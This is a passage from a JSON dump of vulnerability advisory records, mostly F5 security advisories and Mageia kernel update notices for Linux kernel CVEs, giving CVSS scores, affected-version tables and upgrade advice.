"impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9794"], "modified": "2019-07-26T00:00:00", "id": "ANDROID:CVE-2016-9794", "href": "http://www.androidvulnerabilities.org/vulnerabilities/CVE-2016-9794.html", "sourceData": "", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "f5": [{"lastseen": "2023-02-21T21:52:58", "description": "drivers/soc/qcom/qdsp6v2/voice_svc.c in the QDSP6v2 Voice Service driver for the Linux kernel 3.x, as used in Qualcomm Innovation Center (QuIC) Android contributions for MSM devices and other products, allows attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via a write request, as demonstrated by a voice_svc_send_req buffer overflow. ([CVE-2016-5343](<https://vulners.com/cve/CVE-2016-5343>))\n\nImpact\n\nThere is no impact; F5 products are not affected by this vulnerability.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-09-05T23:48:00", "type": "f5", "title": "Linux kernel vulnerability CVE-2016-5343", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5343"], "modified": "2018-09-05T23:48:00", "id": "F5:K50462644", "href": "https://support.f5.com/csp/article/K50462644", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-07T08:26:06", "description": "\nF5 Product Development has assigned ID INSTALLER-2519 (Traffix SDC) to this vulnerability.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Severity| Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM| None| 12.0.0 - 12.1.0 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP AAM| None| 12.0.0 - 12.1.0 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP AFM| None| 12.0.0 - 12.1.0 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP Analytics| None| 12.0.0 - 12.1.0 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP APM| None| 12.0.0 - 12.1.0 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP ASM| None| 12.0.0 - 12.1.0 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP DNS| None| 12.0.0 - 12.1.0| Not vulnerable| None \nBIG-IP Edge Gateway| None| 11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP GTM| None| 11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP Link Controller| None| 12.0.0 - 12.1.0 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP PEM| None| 12.0.0 - 12.1.0 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP PSM| None| 11.4.0 - 11.4.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP WebAccelerator| None| 11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP WOM| None| 11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nARX| None| 6.2.0 - 6.4.0| Not vulnerable| None \nEnterprise Manager| None| 3.1.1| Not vulnerable| None \nFirePass| None| 7.0.0| Not vulnerable| None \nBIG-IQ Cloud| None| 4.0.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Device| None| 4.2.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Security| None| 4.0.0 - 4.5.0| Not vulnerable| None \nBIG-IQ ADC| None| 4.5.0| Not vulnerable| None \nBIG-IQ Centralized Management| None| 5.0.0 \n4.6.0| Not vulnerable| None \nBIG-IQ Cloud and Orchestration| None| 1.0.0| Not vulnerable| None \nF5 iWorkflow| None| 2.0.0| Not vulnerable| None \nLineRate| None| 2.5.0 - 2.6.1| Not vulnerable| None \nF5 MobileSafe| None| 1.0.0| Not vulnerable| None \nF5 WebSafe| None| 1.0.0| Not vulnerable| None \nTraffix SDC| 5.0.0 \n4.0.0 - 4.4.0| None| Low*| Linux kernel \n \n* This vulnerability is rated as Low because exploiting it requires physical access to the system (to plug in a specially prepared USB device).\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n", "cvss3": {"exploitabilityScore": 0.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "PHYSICAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 4.6, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:P/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2016-07-08T22:40:00", "type": "f5", "title": "Linux kernel vulnerability CVE-2015-7515", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7515"], "modified": "2018-06-10T02:00:00", "id": "F5:K24642829", "href": "https://support.f5.com/csp/article/K24642829", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-06-08T19:14:50", "description": "Vulnerability Recommended Actions\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n", "cvss3": {"exploitabilityScore": 0.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "PHYSICAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 4.6, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:P/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2016-07-08T00:00:00", "type": "f5", "title": "SOL24642829 - Linux kernel vulnerability CVE-2015-7515", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7515"], "modified": "2016-07-08T00:00:00", "id": "SOL24642829", "href": "http://support.f5.com/kb/en-us/solutions/public/k/24/sol24642829.html", "cvss": {"score": 4.9, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2017-06-08T00:16:12", "description": "\nF5 Product Development has assigned ID 530413 (BIG-IP), ID 530553 (BIG-IQ), ID 530554 (Enterprise Manager), ID 520651 (FirePass), ID 461496 (ARX), and INSTALLER-1299 (Traffix) to this vulnerability, and has evaluated the currently supported releases for potential vulnerability.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct | Versions known to be vulnerable | Versions known to be not vulnerable | Severity | Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM | 11.0.0 - 11.6.0* \n10.1.0 - 10.2.4* \n| 12.0.0 \n| Low | Linux kernel \n \nBIG-IP AAM | 11.4.0 - 11.6.0* \n| 12.0.0 \n| Low | Linux kernel \nBIG-IP AFM | 11.3.0 - 11.6.0* \n| 12.0.0 \n| Low | Linux kernel \nBIG-IP Analytics | 11.0.0 - 11.6.0* \n| 12.0.0 \n| Low | Linux kernel \nBIG-IP APM | 11.0.0 - 11.6.0* \n10.1.0 - 10.2.4* \n| 12.0.0 \n| Low | Linux kernel \nBIG-IP ASM | 11.0.0 - 11.6.0* \n10.1.0 - 10.2.4* \n| 12.0.0 \n| Low | Linux kernel \nBIG-IP DNS \n| None \n| 12.0.0 \n| Not vulnerable | None \nBIG-IP Edge Gateway \n| 11.0.0 - 11.3.0* \n10.1.0 - 10.2.4* \n| None \n| Low | Linux kernel \nBIG-IP GTM | 11.0.0 - 11.6.0* \n10.1.0 - 10.2.4* \n| None \n| Low | Linux kernel \nBIG-IP Link Controller | 11.0.0 - 11.6.0* \n10.1.0 - 10.2.4* \n| 12.0.0 \n| Low | Linux kernel \nBIG-IP PEM | 11.3.0 - 11.6.0* \n| 12.0.0 \n| Low | Linux kernel \nBIG-IP PSM | 11.0.0 - 11.4.1* \n10.1.0 - 10.2.4* \n| None \n| Low | Linux kernel \nBIG-IP WebAccelerator | 11.0.0 - 11.3.0* \n10.1.0 - 10.2.4* \n| None \n| Low | Linux kernel \nBIG-IP WOM | 11.0.0 - 11.3.0* \n10.1.0 - 10.2.4* \n| None \n| Low | Linux kernel \nARX | 6.0.0 - 6.4.0* \n| None \n| Low | Linux kernel \n \nEnterprise Manager | 3.0.0 - 3.1.1* \n| None | Low | Linux kernel \n \nFirePass | 7.0.0* \n6.0.0 - 6.1.0* \n| None \n| Low | Linux kernel \n \nBIG-IQ Cloud | 4.0.0 - 4.5.0* \n| None \n| Low | Linux kernel \nBIG-IQ Device | 4.2.0 - 4.5.0* \n| None \n| Low | Linux kernel \nBIG-IQ Security | 4.0.0 - 4.5.0* \n| None \n| Low | Linux kernel \nBIG-IQ ADC | 4.5.0* \n| None \n| Low | Linux kernel \nLineRate | None \n| 2.5.0 - 2.6.1 \n| Not vulnerable | None \n \nF5 WebSafe | None \n| 1.0.0 \n| Not vulnerable | None \n \nTraffix SDC | 4.0.0 - 4.4.0* \n3.3.2 - 3.5.1* \n| None \n| Low | Linux kernel \n \n* Although the software of the affected F5 products contains the vulnerable code, the affected F5 products do not use the vulnerable code in a way that exposes the vulnerability in a standard configuration. An attacker must have local shell access to the affected F5 products to trigger an exploit.\n\nIf you are running a version listed in the **Versions known to be vulnerable **column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable **column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nF5 responds to vulnerabilities in accordance with the Severity values published in the previous table. The Severity values and other security vulnerability parameters are defined in [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>).\n\nTo mitigate this vulnerability for affected F5 products, you should only permit management access to F5 products over a secure network and limit shell access to only trusted users. For more information about securing access to BIG-IP/Enterprise Manager systems, refer to [K13309: Restricting access to the Configuration utility by source IP address (11.x - 12.x)](<https://support.f5.com/csp/article/K13309>) and [K13092: Overview of securing access to the BIG-IP system](<https://support.f5.com/csp/article/K13902>).\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n", "cvss3": {}, "published": "2015-11-06T21:25:00", "type": "f5", "title": "Linux kernel vulnerability CVE-2014-9419", "bulletinFamily": "software", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-9419"], "modified": "2016-01-09T02:25:00", "id": "F5:K17551", "href": "https://support.f5.com/csp/article/K17551", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2021-06-08T18:45:09", "description": "* Although the software of the affected F5 products contains the vulnerable code, the affected F5 products do not use the vulnerable code in a way that exposes the vulnerability in a standard configuration. An attacker must have local shell access to the affected F5 products to trigger an exploit.\n\nRecommended Action\n\nIf you are running a version listed in the **Versions known to be vulnerable **column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable **column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nF5 responds to vulnerabilities in accordance with the Severity values published in the previous table. The Severity values and other security vulnerability parameters are defined in SOL4602: Overview of the F5 security vulnerability response policy.\n\nTo mitigate this vulnerability for affected F5 products, you should only permit management access to F5 products over a secure network and limit shell access to only trusted users. For more information about securing access to BIG-IP/Enterprise Manager systems, refer to SOL13309: Restricting access to the Configuration utility by source IP address (11.x - 12.x) and SOL13092: Overview of securing access to the BIG-IP system.\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL167: Downloading software and firmware from F5\n", "cvss3": {}, "published": "2015-11-06T00:00:00", "type": "f5", "title": "SOL17551 - Linux kernel vulnerability CVE-2014-9419", "bulletinFamily": "software", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-9419"], "modified": "2015-11-06T00:00:00", "id": "SOL17551", "href": "http://support.f5.com/kb/en-us/solutions/public/17000/500/sol17551.html", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2021-06-08T19:14:50", "description": "**Note**: As of February 17, 2015, AskF5 Security Advisory articles include the Severity value. Security Advisory articles published before this date do not list a Severity value.\n\nRecommended Action\n\nIf the previous table lists a version in the **Versions known to be not vulnerable** column, you can eliminate this vulnerability by upgrading to the listed version. If the listed version is older than the version you are currently running, or if the table does not list any version in the column, then no upgrade candidate currently exists.\n\nF5 responds to vulnerabilities in accordance with the Severity values published in the previous table. The Severity values and other security vulnerability parameters are defined in [SOL4602: Overview of the F5 security vulnerability response policy](<http://webauthor.olympus.f5net.com:4502/kb/en-us/solutions/public/4000/600/sol4602.html>).\n\nSupplemental Information\n\n * [SOL9970: Subscribing to email notifications regarding F5 products](<http://webauthor.olympus.f5net.com:4502/kb/en-us/solutions/public/9000/900/sol9970.html>)\n * [SOL9957: Creating a custom RSS feed to view new and updated documents](<http://webauthor.olympus.f5net.com:4502/kb/en-us/solutions/public/9000/900/sol9957.html>)\n", "cvss3": {}, "published": "2015-08-14T00:00:00", "type": "f5", "title": "SOL17130 - Linux kernel vulnerability CVE-2015-1420", "bulletinFamily": "software", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 1.9, "vectorString": "AV:L/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1420"], "modified": "2015-08-14T00:00:00", "id": "SOL17130", "href": "http://support.f5.com/kb/en-us/solutions/public/17000/100/sol17130.html", "cvss": {"score": 1.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2020-04-06T22:39:57", "description": "\nF5 Product Development has assigned ID 520182 to this vulnerability and has evaluated the currently supported releases for potential vulnerability.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table.\n\nProduct | Versions known to be vulnerable | Versions known to be not vulnerable | Severity | Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM | None | 11.0.0 - 11.6.0 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP AAM | None | 11.4.0 - 11.6.0 | Not vulnerable | None \nBIG-IP AFM | None | 11.3.0 - 11.6.0 | Not vulnerable | None \nBIG-IP Analytics | None | 11.0.0 - 11.6.0 | Not vulnerable | None \nBIG-IP APM | None | 11.0.0 - 11.6.0 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP ASM | None | 11.0.0 - 11.6.0 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP Edge Gateway | None | 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP GTM | None | 11.0.0 - 11.6.0 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP Link Controller | None | 11.0.0 - 11.6.0 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP PEM | None | 11.3.0 - 11.6.0 | Not vulnerable | None \nBIG-IP PSM | None | 11.0.0 - 11.4.1 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP WebAccelerator | None | 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP WOM | None | 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4 | Not vulnerable | None \nARX | None | 6.0.0 - 6.4.0 | Not vulnerable | None \nEnterprise Manager | None | 3.1.1 | Not vulnerable | None \nFirePass | None | 7.0.0 \n6.0.0 - 6.1.0 | Not vulnerable | None \nBIG-IQ Cloud | None | 4.0.0 - 4.5.0 | Not vulnerable | None \nBIG-IQ Device | None | 4.2.0 - 4.5.0 | Not vulnerable | None \nBIG-IQ Security | None | 4.0.0 - 4.5.0 | Not vulnerable | None \nBIG-IQ ADC | None | 4.5.0 | Not vulnerable | None \nLineRate | None | 2.5.0 - 2.6.1 | Not vulnerable | None \nF5 WebSafe | None | 1.0.0 | Not vulnerable | None \nTraffix SDC | 4.0.0 - 4.4.0 \n3.3.2 - 3.5.1 | None | Low | None \n \n**Note**: As of February 17, 2015, AskF5 Security Advisory articles include the Severity value. Security Advisory articles published before this date do not list a Severity value.\n\nIf the previous table lists a version in the **Versions known to be not vulnerable** column, you can eliminate this vulnerability by upgrading to the listed version. If the listed version is older than the version you are currently running, or if the table does not list any version in the column, then no upgrade candidate currently exists.\n\nF5 responds to vulnerabilities in accordance with the Severity values published in the previous table. The Severity values and other security vulnerability parameters are defined in [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>).\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n", "cvss3": {}, "published": "2015-08-14T19:47:00", "type": "f5", "title": "Linux kernel vulnerability CVE-2015-1420", "bulletinFamily": "software", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 1.9, "vectorString": "AV:L/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1420"], "modified": "2019-05-08T19:20:00", "id": "F5:K17130", "href": "https://support.f5.com/csp/article/K17130", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2016-09-26T17:23:18", "description": "The assoc_array_gc function in the associative-array implementation in lib/assoc_array.c in the Linux kernel before 3.16.3 does not properly implement garbage collection, which allows local users to cause a denial of service (NULL pointer dereference and system crash) or possibly have unspecified other impact via multiple \"keyctl newring\" operations followed by a \"keyctl timeout\" operation. ([CVE-2014-3631](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-3631>)) \n\n", "cvss3": {}, "published": "2014-10-23T00:00:00", "type": "f5", "title": "SOL15729 - Associative array vulnerability CVE-2014-3631", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-3631"], "modified": "2014-10-23T00:00:00", "id": "SOL15729", "href": "http://support.f5.com/kb/en-us/solutions/public/15000/700/sol15729.html", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2023-04-03T12:30:56", "description": "An issue was discovered in the size of the stack guard page on Linux, specifically a 4k stack guard page is not sufficiently large and can be \"jumped\" over (the stack guard page is bypassed), this affects Linux Kernel versions 4.11.5 and earlier (the stackguard page was introduced in 2010). ([CVE-2017-1000364](<https://vulners.com/cve/CVE-2017-1000364>))\n\nImpact\n\nThis vulnerability allows unauthorized disclosure of information, unauthorized modification, and disruption of service.\n", "cvss3": {"exploitabilityScore": 1.4, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.4, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-07-11T14:59:00", "type": "f5", "title": "Linux kernel vulnerability CVE-2017-1000364", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 1.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.2, "vectorString": "AV:L/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-1000364"], "modified": "2021-02-25T03:01:00", "id": "F5:K51931024", "href": "https://support.f5.com/csp/article/K51931024", "cvss": {"score": 6.2, "vector": "AV:L/AC:H/Au:N/C:C/I:C/A:C"}}], "mageia": [{"lastseen": "2023-05-27T15:00:32", "description": "This update is based on the upstream 4.4.22 kernel and fixes at least theese security issues: sound/core/timer.c in the Linux kernel through 4.6 does not initialize certain r1 data structures, which allows local users to obtain sensitive information from kernel stack memory via crafted use of the ALSA timer interface, related to the (1) snd_timer_user_ccallback and (2) snd_timer_user_tinterrupt functions (CVE-2016-4578). The tipc_nl_compat_link_dump function in net/tipc/netlink_compat.c in the Linux kernel through 4.6.3 does not properly copy a certain string, which allows local users to obtain sensitive information from kernel stack memory by reading a Netlink message (CVE-2016-5243). The rds_inc_info_copy function in net/rds/recv.c in the Linux kernel through 4.6.3 does not initialize a certain structure member, which allows remote attackers to obtain sensitive information from kernel stack memory by reading an RDS message (CVE-2016-5244). Memory leak in the airspy_probe function in drivers/media/usb/airspy/airspy.c in the airspy USB driver in the Linux kernel before 4.7 allows local users to cause a denial of service (memory consumption) via a crafted USB device that emulates many VFL_TYPE_SDR or VFL_TYPE_SUBDEV devices and performs many connect and disconnect operations (CVE-2016-5400). Race condition in the ioctl_send_fib function in drivers/scsi/aacraid/ commctrl.c in the Linux kernel through 4.7 allows local users to cause a denial of service (out-of-bounds access or system crash) by changing a certain size value, aka a \"double fetch\" vulnerability (CVE-2016-6480). This update also changes the following: \\- enables STRICT_DEVMEM as a security hardening \\- disables FW_LOADER_USER_HELPER_FALLBACK again (un-intentionally enabled in 4.4 series upgrade) that slows down boot or even makes wireless connection fail with drivers with multiple possible firmwares (mga#19390). For other fixes in this update, see the referenced changelogs. \n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2016-10-18T18:43:39", "type": "mageia", "title": "Updated kernel packages fixes security vulnerablilities\n", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4578", "CVE-2016-5243", "CVE-2016-5244", "CVE-2016-5400", "CVE-2016-6480"], "modified": "2016-10-18T18:43:39", "id": "MGASA-2016-0345", "href": "https://advisories.mageia.org/MGASA-2016-0345.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-05-28T02:27:12", "description": "This kernel update is based on the upstream 4.1.12 longterm kernel and fixes at least the following security issue: Moein Ghasemzadeh discovered that the USB WhiteHEAT serial driver contained hardcoded attributes about the USB devices. An attacker could construct a fake WhiteHEAT USB device that, when inserted, causes a denial of service (system crash) (CVE-2015-5257). It also fixes various upstream bugs, for more info see the referenced changelogs. Other fixes in this update: * improve ath10k (QCA99X0, QCA988X, QCA6174) support (mga#16915) * silence a harmless warning on 32bit non-dt hardware (mga#17010) * fix regression with AlpsPS/2 ALPS DualPoint TouchPad of a Dell Latitude D600 (mga#17034) * kernel-firmware-nonfee: \\- Add firmware for mwlwifi \\- add firmware for QCA99X0 hw2.0, QCA988X hw2.0, QCA6174 hw2.1/3.0 (ath10k) \\- brcmfmac: firmware refresh for BCM43602 PCIE devices * iwlwifi-agn-ucode: \\- Add firmware for Intel Bluetooth 7265 (D1) \\- Update firmware for Intel Bluetooth 7265 (C0/D0) \\- Update firmware for Intel Bluetooth 7260 (B3/B4/B5/B6) \n", "cvss3": {}, "published": "2015-11-07T20:11:27", "type": "mageia", "title": "Updated kernel packages fixes security vulnerability\n", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, 